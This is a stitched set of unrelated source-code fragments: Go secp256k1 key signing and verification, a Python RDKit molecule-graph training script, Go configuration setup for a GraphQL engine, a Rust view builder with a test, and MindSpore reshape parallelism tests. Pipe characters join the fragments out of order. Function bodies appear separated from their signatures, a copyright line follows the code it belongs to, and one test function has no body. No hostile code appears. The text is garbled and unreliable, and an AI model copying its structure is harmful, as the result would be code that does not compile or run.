// Bytes returns the raw ECDSA private key bytes.
func (privkey PrivKeySecp256k1) Bytes() []byte {
return cryptoCodec.MustMarshalBinaryBare(privkey)
}
// Sign creates a recoverable ECDSA signature on the secp256k1 curve over the
// Keccak256 hash of the provided message. The produced signature is 65 bytes
// where the last byte contains the recovery ID.
func (privkey PrivKeySecp256k1) Sign(msg []byte) ([]byte, error) {
return ethcrypto.Sign(ethcrypto.Keccak256Hash(msg).Bytes(), privkey.ToECDSA())
}
// Equals returns true if two ECDSA private keys are equal and false otherwise.
func (privkey PrivKeySecp256k1) Equals(other tmcrypto.PrivKey) bool {
if other, ok := other.(PrivKeySecp256k1); ok {
return bytes.Equal(privkey.Bytes(), other.Bytes())
}
return false
}
// ToECDSA returns the ECDSA private key as a reference to ecdsa.PrivateKey type.
func (privkey PrivKeySecp256k1) ToECDSA() *ecdsa.PrivateKey {
key, _ := ethcrypto.ToECDSA(privkey)
return key
}
// ----------------------------------------------------------------------------
// secp256k1 Public Key
var _ tmcrypto.PubKey = (*PubKeySecp256k1)(nil)
// PubKeySecp256k1 defines a type alias for an ecdsa.PublicKey that implements
// Tendermint's PubKey interface.
type PubKeySecp256k1 []byte
// Address returns the address of the ECDSA public key.
func (key PubKeySecp256k1) Address() tmcrypto.Address {
pubk, _ := ethcrypto.UnmarshalPubkey(key)
return tmcrypto.Address(ethcrypto.PubkeyToAddress(*pubk).Bytes())
}
// Bytes returns the raw bytes of the ECDSA public key.
func (key PubKeySecp256k1) Bytes() []byte {
bz, err := cryptoCodec.MarshalBinaryBare(key)
if err != nil {
panic(err)
}
return bz
}
// VerifyBytes verifies that the ECDSA public key created a given signature over
// the provided message. It will calculate the Keccak256 hash of the message
// prior to verification.
func (key PubKeySecp256k1) VerifyBytes(msg []byte, sig []byte) bool {
if len(sig) == 65 {
// remove recovery ID if contained in the signature
sig = sig[:len(sig)-1]
}
// the signature needs to be in [R || S] format when provided to VerifySignature
return ethsecp256k1.VerifySignature(key, ethcrypto.Keccak256Hash(msg).Bytes(), sig)
}
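// The Sign and VerifyBytes comments above describe a 65-byte recoverable signature
// whose trailing recovery ID is stripped before verification. Below is a minimal,
// hypothetical round-trip sketch (not part of the original source) that only uses
// functions defined in this file and assumes it lives in the same package.
func exampleSignVerify() (bool, error) {
	priv, err := GenerateKey()
	if err != nil {
		return false, err
	}
	msg := []byte("example message")
	sig, err := priv.Sign(msg) // 65 bytes: [R || S || recovery ID]
	if err != nil {
		return false, err
	}
	// PubKey returns a tmcrypto.PubKey whose concrete type is PubKeySecp256k1.
	pub := priv.PubKey().(PubKeySecp256k1)
	return pub.VerifyBytes(msg, sig), nil
}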
// Equals returns true if two ECDSA public keys are equal and false otherwise.
func (key PubKeySecp256k1) Equals(other tmcrypto.PubKey) bool {
if other, ok := other.(PubKeySecp256k1); ok {
return bytes.Equal(key.Bytes(), other.Bytes())
}
return false
} | // ----------------------------------------------------------------------------
// secp256k1 Private Key
var _ tmcrypto.PrivKey = PrivKeySecp256k1{} |
chem_train_single.py | ''' | All rights reserved.
@author: neilswainston
'''
# pylint: disable=invalid-name
# pylint: disable=no-member
# pylint: disable=wrong-import-order
from rdkit import Chem
import scipy
from gae.tf import train_single
import numpy as np
import pandas as pd
def _load_data(filename):
'''Load data.'''
df = pd.read_csv(filename)
smiles = df['smiles'][0]
adj, features = _get_data(smiles)
return adj, features
def _get_data(smiles):
'''Get data from SMILES.'''
mol = Chem.MolFromSmiles(smiles)
adj = scipy.sparse.lil_matrix(
(mol.GetNumAtoms(), mol.GetNumAtoms()), dtype=int)
for bond in mol.GetBonds():
adj[bond.GetBeginAtomIdx(), bond.GetEndAtomIdx()] = 1
features = np.array([[atom.GetAtomicNum(),
atom.GetMass(),
atom.GetExplicitValence(),
atom.GetFormalCharge()]
for atom in mol.GetAtoms()])
return scipy.sparse.csr_matrix(adj), scipy.sparse.lil_matrix(features)
def main():
'''main method.'''
# Load data:
filename = 'data/spectra.csv'
adj, features = _load_data(filename)
# Train:
train_single.train(adj, features, epochs=10000)
if __name__ == '__main__':
main() | (c) University of Liverpool 2020
|
init.go | package core
import (
"fmt"
"regexp"
"strings"
"unicode"
"github.com/dosco/super-graph/core/internal/psql"
"github.com/dosco/super-graph/core/internal/qcode"
"github.com/gobuffalo/flect"
)
func (sg *SuperGraph) initConfig() error {
c := sg.conf
for k, v := range c.Inflections {
flect.AddPlural(k, v)
}
// Variables: Validate and sanitize
for k, v := range c.Vars {
c.Vars[k] = sanitizeVars(v)
}
// Tables: Validate and sanitize
tm := make(map[string]struct{})
for i := 0; i < len(c.Tables); i++ {
t := &c.Tables[i]
t.Name = flect.Pluralize(strings.ToLower(t.Name))
if _, ok := tm[t.Name]; ok {
sg.conf.Tables = append(c.Tables[:i], c.Tables[i+1:]...)
sg.log.Printf("WRN duplicate table found: %s", t.Name)
}
tm[t.Name] = struct{}{}
t.Table = flect.Pluralize(strings.ToLower(t.Table))
}
sg.roles = make(map[string]*Role)
for i := 0; i < len(c.Roles); i++ {
role := &c.Roles[i]
role.Name = sanitize(role.Name)
if _, ok := sg.roles[role.Name]; ok {
c.Roles = append(c.Roles[:i], c.Roles[i+1:]...)
sg.log.Printf("WRN duplicate role found: %s", role.Name)
}
role.Match = sanitize(role.Match)
role.tm = make(map[string]*RoleTable)
for n, table := range role.Tables {
role.tm[table.Name] = &role.Tables[n]
}
sg.roles[role.Name] = role
}
	// If the user role is not defined then create it
if _, ok := sg.roles["user"]; !ok {
ur := Role{
Name: "user",
tm: make(map[string]*RoleTable),
}
c.Roles = append(c.Roles, ur)
sg.roles["user"] = &ur
}
	// If the anon role is not defined and DefaultBlock is not set then create it
if _, ok := sg.roles["anon"]; !ok && !c.DefaultBlock {
ur := Role{
Name: "anon",
tm: make(map[string]*RoleTable),
}
c.Roles = append(c.Roles, ur)
sg.roles["anon"] = &ur
}
// Roles: validate and sanitize
c.RolesQuery = sanitizeVars(c.RolesQuery)
if len(c.RolesQuery) == 0 {
sg.log.Printf("WRN roles_query not defined: attribute based access control disabled")
}
_, userExists := sg.roles["user"]
_, sg.anonExists = sg.roles["anon"]
sg.abacEnabled = userExists && len(c.RolesQuery) != 0
return nil
}
func getDBTableAliases(c *Config) map[string][]string {
m := make(map[string][]string, len(c.Tables))
for i := range c.Tables {
t := c.Tables[i]
if len(t.Table) == 0 || len(t.Columns) != 0 {
continue
}
m[t.Table] = append(m[t.Table], t.Name)
}
return m
}
func addTables(c *Config, di *psql.DBInfo) error {
for _, t := range c.Tables {
if len(t.Table) == 0 || len(t.Columns) == 0 {
continue
}
if err := addTable(di, t.Columns, t); err != nil {
return err
}
}
return nil
}
func addTable(di *psql.DBInfo, cols []Column, t Table) error {
bc, ok := di.GetColumn(t.Table, t.Name)
if !ok {
return fmt.Errorf(
"Column '%s' not found on table '%s'",
t.Name, t.Table)
}
if bc.Type != "json" && bc.Type != "jsonb" {
return fmt.Errorf(
"Column '%s' in table '%s' is of type '%s'. Only JSON or JSONB is valid",
t.Name, t.Table, bc.Type)
}
table := psql.DBTable{
Name: t.Name,
Key: strings.ToLower(t.Name),
Type: bc.Type,
}
columns := make([]psql.DBColumn, 0, len(cols))
for i := range cols {
c := cols[i]
columns = append(columns, psql.DBColumn{
Name: c.Name,
Key: strings.ToLower(c.Name),
Type: c.Type,
})
}
di.AddTable(table, columns)
bc.FKeyTable = t.Name
return nil
}
func addForeignKeys(c *Config, di *psql.DBInfo) error {
for _, t := range c.Tables {
for _, c := range t.Columns {
if len(c.ForeignKey) == 0 {
continue
}
if err := addForeignKey(di, c, t); err != nil {
return err
}
}
}
return nil
}
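// A hypothetical config fragment (not part of the original source) showing the shape
// of data addTables and addForeignKeys expect: a JSON/JSONB column on an existing
// database table exposed as a virtual table, with one of its columns linked to another
// table through ForeignKey. Field names follow how they are read above; the concrete
// table and column names are illustrative assumptions.
var exampleTables = []Table{
	{
		Name:  "tag_count", // virtual table backed by a jsonb column on "products"
		Table: "products",  // real database table holding the jsonb column
		Columns: []Column{
			{Name: "tag_id", Type: "bigint", ForeignKey: "tags.id"},
			{Name: "count", Type: "int"},
		},
	},
}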
func addForeignKey(di *psql.DBInfo, c Column, t Table) error {
c1, ok := di.GetColumn(t.Name, c.Name)
if !ok {
return fmt.Errorf(
"Invalid table '%s' or column '%s' in Config",
t.Name, c.Name)
}
v := strings.SplitN(c.ForeignKey, ".", 2)
if len(v) != 2 |
fkt, fkc := v[0], v[1]
c2, ok := di.GetColumn(fkt, fkc)
if !ok {
return fmt.Errorf(
"Invalid foreign_key in Config for table '%s' and column '%s",
t.Name, c.Name)
}
c1.FKeyTable = fkt
c1.FKeyColID = []int16{c2.ID}
return nil
}
func addRoles(c *Config, qc *qcode.Compiler) error {
for _, r := range c.Roles {
for _, t := range r.Tables {
if err := addRole(qc, r, t); err != nil {
return err
}
}
}
return nil
}
func addRole(qc *qcode.Compiler, r Role, t RoleTable) error {
blockFilter := []string{"false"}
query := qcode.QueryConfig{
Limit: t.Query.Limit,
Filters: t.Query.Filters,
Columns: t.Query.Columns,
DisableFunctions: t.Query.DisableFunctions,
}
if t.Query.Block {
query.Filters = blockFilter
}
insert := qcode.InsertConfig{
Filters: t.Insert.Filters,
Columns: t.Insert.Columns,
Presets: t.Insert.Presets,
}
if t.Insert.Block {
insert.Filters = blockFilter
}
update := qcode.UpdateConfig{
Filters: t.Update.Filters,
Columns: t.Update.Columns,
Presets: t.Update.Presets,
}
if t.Update.Block {
update.Filters = blockFilter
}
delete := qcode.DeleteConfig{
Filters: t.Delete.Filters,
Columns: t.Delete.Columns,
}
if t.Delete.Block {
delete.Filters = blockFilter
}
return qc.AddRole(r.Name, t.Name, qcode.TRConfig{
Query: query,
Insert: insert,
Update: update,
Delete: delete,
})
}
func (r *Role) GetTable(name string) *RoleTable {
return r.tm[name]
}
func sanitize(value string) string {
return strings.ToLower(strings.TrimSpace(value))
}
var (
varRe1 = regexp.MustCompile(`(?mi)\$([a-zA-Z0-9_.]+)`)
varRe2 = regexp.MustCompile(`\{\{([a-zA-Z0-9_.]+)\}\}`)
)
func sanitizeVars(s string) string {
s0 := varRe1.ReplaceAllString(s, `{{$1}}`)
s1 := strings.Map(func(r rune) rune {
if unicode.IsSpace(r) {
return ' '
}
return r
}, s0)
return varRe2.ReplaceAllStringFunc(s1, func(m string) string {
return strings.ToLower(m)
})
}
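// A small hypothetical check (not part of the original source) illustrating what
// sanitizeVars does: "$Name" tokens become lower-cased "{{name}}" placeholders and
// every whitespace character is mapped to a plain space.
func exampleSanitizeVars() bool {
	in := "SELECT * FROM users WHERE id = $User_ID"
	return sanitizeVars(in) == "SELECT * FROM users WHERE id = {{user_id}}"
}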
| {
return fmt.Errorf(
"Invalid foreign_key in Config for table '%s' and column '%s",
t.Name, c.Name)
} |
main.rs | use super::get_forest;
use super::get_visitors;
use crate::model;
pub fn main(
configuration: model::Configuration,
type_: model::Type<()>,
paths: Vec<model::Path>,
) -> model::Result<model::View> |
#[cfg(test)]
mod tests {
use super::*;
use std::array;
#[test]
fn handles() {
let actual = main(
model::Configuration {
template: model::Template::Default {
initializer: Some(syn::parse_str("abc").unwrap()),
identifiers: true,
},
debug: true,
..model::stubs::configuration()
},
model::Type {
name: quote::format_ident!("Asset"),
..model::stubs::type_()
},
vec![model::Path {
relative: vec![String::from('b')],
absolute: String::from("/a/b"),
}],
);
let actual = actual.unwrap();
let expected = model::View {
type_: quote::format_ident!("Asset"),
visitors: vec![
model::Visitor::Array(model::Initializer::Macro(syn::parse_str("abc").unwrap())),
model::Visitor::Identifiers,
],
forest: array::IntoIter::new([(
String::from('b'),
model::Tree::File(model::File {
identifier: quote::format_ident!("r#B"),
index: 0,
relative_path: String::from('b'),
absolute_path: String::from("/a/b"),
}),
)])
.collect(),
debug: true,
};
assert_eq!(actual, expected);
}
}
| {
let visitors = get_visitors::main(configuration.template, type_.structure)?;
let forest = get_forest::main(paths)?;
Ok(model::View {
type_: type_.name,
visitors,
forest,
debug: configuration.debug,
})
} |
test_reshape.py | # Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from mindspore.train import Model, ParallelMode
from mindspore.nn.loss import SoftmaxCrossEntropyWithLogits
from mindspore.nn.optim.momentum import Momentum
from mindspore import Tensor
import mindspore as ms
import numpy as np
from mindspore.ops import operations as P
import mindspore.nn as nn
from mindspore.common.parameter import Parameter
from tests.dataset_mock import MindData
from mindspore import context
from tests.ut.python.ops.test_math_ops import VirtualLoss
from mindspore.common.api import _executor
from mindspore.ops import composite as C
from mindspore.ops.operations.comm_ops import _VirtualDataset
from mindspore.ops import functional as F
from mindspore.common.parameter import ParameterTuple
from mindspore.common import dtype as mstype
from mindspore.parallel import set_algo_parameters
context.set_context(mode=context.GRAPH_MODE)
context.reset_auto_parallel_context()
class Dataset(MindData):
def __init__(self, predict, label, length=3, input_num=2):
super(Dataset, self).__init__(size=length)
self.predict = predict
self.label = label
self.index = 0
self.length = length
self.input_num = input_num
def __iter__(self):
return self
def __next__(self):
if self.index >= self.length:
raise StopIteration
self.index += 1
if self.input_num == 2:
return self.predict, self.label
else:
return self.predict,
def reset(self):
self.index = 0
class ReshapeNet(nn.Cell):
def __init__(self, strategy0, strategy1, strategy2):
super(ReshapeNet, self).__init__()
self.relu = P.ReLU().set_strategy(strategy0)
self.reshape = P.Reshape().set_strategy(strategy1)
self.matmul = P.MatMul().set_strategy(strategy2)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
def construct(self, x):
x = self.relu(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
return x
def reshape_net(strategy0, strategy1, strategy2):
return ReshapeNet(strategy0=strategy0, strategy1=strategy1, strategy2=strategy2)
def reshape_common(parallel_mode, strategy0, strategy1, strategy2, strategy_loss):
batch_size = 32
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
predict = Tensor(np.ones([32, 512, 7, 7]), dtype=ms.float32)
label = Tensor(np.ones([32]), dtype=ms.int32)
dataset = Dataset(predict, label, 2)
net = reshape_net(strategy0, strategy1, strategy2)
loss = SoftmaxCrossEntropyWithLogits(is_grad=False, sparse=True)
loss.softmax_cross_entropy.set_strategy(strategy_loss)
loss.one_hot.set_strategy(((8,1), (), ()))
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss, opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_reshape1():
strategy0 = ((8, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape1_strategy_1():
strategy0 = ((8, 1, 1, 1), )
strategy1 = ((8, 1, 1, 1), )
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
try:
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
except:
pass
def test_reshape1_strategy_2():
strategy0 = ((8, 1, 1, 1), )
strategy1 = ((8, 1, 1, 1), )
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
try:
reshape_common(ParallelMode.AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
except:
pass
def test_reshape2():
strategy0 = ((8, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape3():
strategy0 = ((2, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape4():
strategy0 = ((1, 1, 1, 1), )
strategy1 = None
strategy2 = ((8, 1), (1, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape5():
strategy0 = ((2, 1, 1, 1), )
strategy1 = None
strategy2 = ((1, 8), (8, 1))
strategy_loss = ((8, 1), (8, 1))
reshape_common(ParallelMode.SEMI_AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
def test_reshape_auto():
strategy0 = None
strategy1 = None
strategy2 = None
strategy_loss = None
reshape_common(ParallelMode.AUTO_PARALLEL, strategy0, strategy1, strategy2, strategy_loss)
class NetWithLoss(nn.Cell):
def __init__(self, network):
super(NetWithLoss, self).__init__()
self.loss = VirtualLoss()
self.network = network
def construct(self, x):
predict = self.network(x)
return self.loss(predict)
class GradWrap(nn.Cell):
def __init__(self, network):
super(GradWrap, self).__init__()
self.network = network
def construct(self, x):
return C.grad_all(self.network)(x)
class ReshapeNet1(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet1, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
return x
class ReshapeNet2(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet2, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
self.reduce_sum = P.ReduceSum(keep_dims=True)
self.reshape3 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
x = self.reduce_sum(x, -1)
x = self.reshape3(x, ())
return x
class ReshapeNet3(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet3, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.reshape2 = P.Reshape()
self.reduce_sum = P.ReduceSum(keep_dims=False)
self.reshape3 = P.Reshape()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
x = self.matmul(x, self.matmul_weight)
x = self.reshape2(x, (256 * 256,))
x = self.reduce_sum(x, -1)
x = self.reshape3(x, (1, 1))
return x
class ReshapeNet4(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet4, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.reshape2 = P.Reshape()
self.matmul = P.MatMul().set_strategy(strategy0)
self.matmul_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
w = self.reshape2(self.matmul_weight, (25088, 256))
x = self.matmul(x, w)
return x
class ReshapeNet5(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet5, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul1 = P.MatMul().set_strategy(strategy0)
self.matmul1_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.matmul2 = P.MatMul().set_strategy(strategy0)
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
matmul1_o = self.matmul1(x, self.matmul1_weight)
matmul2_o = self.matmul2(matmul1_o, x)
return matmul2_o
class ReshapeNet6(nn.Cell):
def __init__(self, strategy0):
super(ReshapeNet6, self).__init__()
self.virtual_dataset = _VirtualDataset()
self.reshape = P.Reshape()
self.matmul1_1 = P.MatMul().set_strategy(strategy0)
self.matmul1_2 = P.MatMul().set_strategy(strategy0)
self.matmul1_weight = Parameter(Tensor(np.ones([25088, 256]), dtype=ms.float32), name="weight")
self.matmul2 = P.MatMul().set_strategy(strategy0)
self.add = P.TensorAdd()
def construct(self, x):
x = self.virtual_dataset(x)
x = self.reshape(x, (256, 25088))
matmul1_1_o = self.matmul1_1(x, self.matmul1_weight)
matmul1_2_o = self.matmul1_2(x, self.matmul1_weight)
matmul1_o = self.add(matmul1_1_o, matmul1_2_o)
matmul2_o = self.matmul2(matmul1_o, x)
return matmul2_o
def reshape_net2(backbone):
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
input = Tensor(np.ones([batch_size * device_num, 512, 7, 7]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(backbone))
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
_executor.compile(net, input)
def test_reshape_net1_1():
reshape_net2(ReshapeNet1(((1, 8), (8, 1))))
def test_reshape_net1_2():
reshape_net2(ReshapeNet1(((1, 8), (8, 2))))
def test_reshape_net2_1():
reshape_net2(ReshapeNet2(((1, 8), (8, 1))))
def test_reshape_net2_2():
reshape_net2(ReshapeNet2(((1, 8), (8, 2))))
def test_reshape_net3_1():
reshape_net2(ReshapeNet3(((1, 8), (8, 1))))
def test_reshape_net3_2():
reshape_net2(ReshapeNet3(((1, 8), (8, 2))))
def test_reshape_net4_1():
try:
reshape_net2(ReshapeNet4(((1, 8), (8, 1))))
except:
pass
def test_reshape_net4_2():
try:
reshape_net2(ReshapeNet4(((1, 8), (8, 2))))
except:
pass
def test_reshape_net5_1():
reshape_net2(ReshapeNet5(((1, 8), (8, 1))))
def test_reshape_net5_2():
reshape_net2(ReshapeNet5(((1, 8), (8, 2))))
def test_reshape_net6_1():
reshape_net2(ReshapeNet6(((1, 8), (8, 1))))
def test_reshape_net6_2():
reshape_net2(ReshapeNet6(((1, 8), (8, 2))))
class TrainOneStepCell(nn.Cell):
"""
Network training package class.
Append an optimizer to the training network after that the construct function
can be called to create the backward graph.
Args:
network (Cell): The training network.
optimizer (Cell): Optimizer for updating the weights.
sens (Number): The adjust parameter. Default: 1.0.
Examples:
>>> net = Net()
>>> loss_fn = nn.SoftmaxCrossEntropyWithLogits()
>>> optim = Momentum(net.trainable_params(), learning_rate=0.1, momentum=0.9)
>>> loss_net = WithLossCell(net, loss_fn)
>>> train_net = TrainOneStepCell(loss_net, optim)
"""
def __init__(self, network, optimizer, sens=1.0):
super(TrainOneStepCell, self).__init__(auto_prefix=False)
self.network = network
self.network.add_flags(defer_inline=True)
self.weights = ParameterTuple(network.trainable_params())
self.optimizer = optimizer
self.grad = C.GradOperation('grad',
get_by_list=True,
sens_param=True)
self.sens = sens
def construct(self, data):
weights = self.weights
loss = self.network(data)
sens = P.Fill()(P.DType()(loss), P.Shape()(loss), self.sens)
grads = self.grad(self.network, weights)(data, sens)
return F.depend(loss, self.optimizer(grads))
def reshape_common2(parallel_mode, net):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
predict = Tensor(np.ones([batch_size, 512, 7, 7]), dtype=ms.float32)
label = Tensor(np.ones([batch_size]), dtype=ms.int32)
dataset = Dataset(predict, label, 2, input_num=1)
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=16)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
train_net = TrainOneStepCell(net, opt).set_train()
model = Model(train_net)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_reshape_common2_0():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet1(((1, 8), (8, 1))))
def test_reshape_common2_1():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet1(((1, 8), (8, 2))))
def test_reshape_common2_2():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet2(((1, 8), (8, 1))))
def test_reshape_common2_3():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet2(((1, 8), (8, 2))))
def test_reshape_common2_4():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet3(((1, 8), (8, 1))))
def test_reshape_common2_5():
reshape_common2(ParallelMode.SEMI_AUTO_PARALLEL, ReshapeNet3(((1, 8), (8, 2))))
class BatchNormReshapeNet(nn.Cell):
def __init__(self):
super(BatchNormReshapeNet, self).__init__()
self.vd = P._VirtualDataset()
self.batch_norm = nn.BatchNorm1d(512, affine=False)
self.reshape = P.Reshape()
self.prelu = nn.PReLU(channel=256)
def construct(self, x):
x = self.vd(x)
x = self.batch_norm(x)
x = self.reshape(x, (512, 256))
x = self.prelu(x)
return x
def test_batchnorm_reshape_train():
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
input = Tensor(np.ones([batch_size * device_num, 512]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(BatchNormReshapeNet()))
_executor.compile(net, input)
def bn_with_initialize(out_channels):
bn = nn.BatchNorm2d(out_channels, momentum=0.3, eps=1e-5).add_flags_recursive(fp32=True)
return bn
def fc_with_initialize(input_channels, out_channels):
return nn.Dense(input_channels, out_channels).add_flags_recursive(fp16=True)
class BNReshapeDenseBNNet(nn.Cell):
def __init__(self):
super(BNReshapeDenseBNNet, self).__init__()
self.batch_norm = bn_with_initialize(2)
self.reshape = P.Reshape()
self.cast = P.Cast()
self.batch_norm2 = nn.BatchNorm1d(512, affine=False)
self.fc = fc_with_initialize(2 * 32 * 32, 512)
def construct(self, x):
x = self.batch_norm(x)
x = self.reshape(x, (16, 2*32*32))
x = self.fc(x)
x = self.batch_norm2(x)
return x
def test_bn_reshape_dense_bn_train():
batch_size = 16
device_num = 16
context.set_auto_parallel_context(device_num=device_num, global_rank=0)
input = Tensor(np.ones([batch_size, 2, 32, 32]).astype(np.float32) * 0.01)
net = GradWrap(NetWithLoss(BNReshapeDenseBNNet()))
context.set_auto_parallel_context(parallel_mode="semi_auto_parallel")
_executor.compile(net, input)
class ParallelReduceMeanNet(nn.Cell):
def __init__(self, conv_in_channel, conv_out_channel,
reducemean_keep_dims=False, reducemean_axis=-1, strategy=None):
super().__init__()
self.conv = nn.Conv2d(in_channels=conv_in_channel, out_channels=conv_out_channel,
kernel_size=1, stride=1, pad_mode='valid', has_bias=True,
weight_init='ones', bias_init='ones')
self.reduce_mean = P.ReduceMean(keep_dims=reducemean_keep_dims)
self.flat = nn.Flatten()
self.reducemean_axis = reducemean_axis
if strategy is not None:
self.reduce_mean.set_strategy(strategy)
def construct(self, inputs):
x = self.conv(inputs)
x = self.reduce_mean(x, self.reducemean_axis)
x = self.flat(x)
return x
class CrossEntropyLoss(nn.Cell):
def __init__(self, reduction='mean'):
super(CrossEntropyLoss, self).__init__()
self.reduce_mean = P.ReduceMean()
self.cross_entropy = SoftmaxCrossEntropyWithLogits()
self.reduction = reduction
def construct(self, logits, label):
loss = self.cross_entropy(logits, label)
if self.reduction == 'mean':
loss = self.reduce_mean(loss, (-1,))
return loss
def test_flatten_reshape(parallel_mode="auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_axis=(2, 3), strategy=((4, 2, 1, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 64]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
    model = Model(net, loss_fn=loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
def test_flatten_reshape2(parallel_mode="auto_parallel"):
batch_size = 16
learning_rate = 0.1
momentum = 0.9
epoch_size = 2
context.reset_auto_parallel_context()
context.set_auto_parallel_context(parallel_mode=parallel_mode, device_num=8)
set_algo_parameters(fully_use_devices=False)
net = ParallelReduceMeanNet(conv_in_channel=3, conv_out_channel=64, reducemean_axis=(2, 3), strategy=((4, 1, 1, 1),))
loss = CrossEntropyLoss()
predict = Tensor(np.ones([batch_size, 3, 32, 32]), dtype=ms.float32)
label = Tensor(np.ones([batch_size, 64]), dtype=ms.float32)
dataset = Dataset(predict, label, 2, input_num=2)
opt = Momentum(net.trainable_params(), learning_rate, momentum)
model = Model(net, loss_fn = loss, optimizer=opt)
model.train(epoch_size, dataset, dataset_sink_mode=False)
class ParallelReshapeNet(nn.Cell):
def __init__(self, dense_in_channel, dense_out_channel, shape, strategy=None):
super().__init__()
self.flat = nn.Flatten()
self.dense = nn.Dense(in_channels=dense_in_channel,
out_channels=dense_out_channel,
weight_init='ones',
bias_init='ones',
has_bias=True)
self.reshape = P.Reshape()
self.shape = shape
self.reshape.set_strategy(strategy)
def construct(self, inputs):
x = self.flat(inputs)
x = self.dense(x)
x = self.reshape(x, self.shape)
return x
# the shape of input and output of reshape is the same
# reshape is optimized before step_parallel
def test_flatten_reshape3(parallel_mode="auto_parallel"):
|
class CrossEntropyLoss2(nn.Cell):
def __init__(self, reduction='mean'):
